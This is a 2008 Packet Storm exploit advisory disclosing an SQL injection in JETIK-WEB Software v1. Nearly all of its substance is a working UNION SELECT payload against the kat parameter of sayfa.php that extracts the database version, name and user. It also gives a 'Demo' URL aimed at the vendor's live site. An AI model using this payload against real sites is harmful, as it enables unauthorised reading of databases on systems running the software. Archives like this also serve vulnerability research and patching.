jetik-sql.txt

2008-09-24T00:00:00
ID PACKETSTORM:70267
Type packetstorm
Reporter d3v1l
Modified 2008-09-24T00:00:00

Description

                                        
                                            `[~]-----------------------------------------------------------  
[~] JETIK-WEB Software v1 - SQL Injection Vulnerability  
[~]  
[~] http://www.jetik.net  
[~] ----------------------------------------------------------  
[~] Bug founded by d3v1l  
[~]  
[~] Date: 22.09.2008  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO ALL:-  
[~]  
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]  
[~] Pentest| Gibon| Pig AND milw0rm staff  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/*  
[~]  
[~] Demo :-  
[~]  
[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*  
[~]  
[~]--------------------------------------------------------------------------------------------------------------  
  
  
`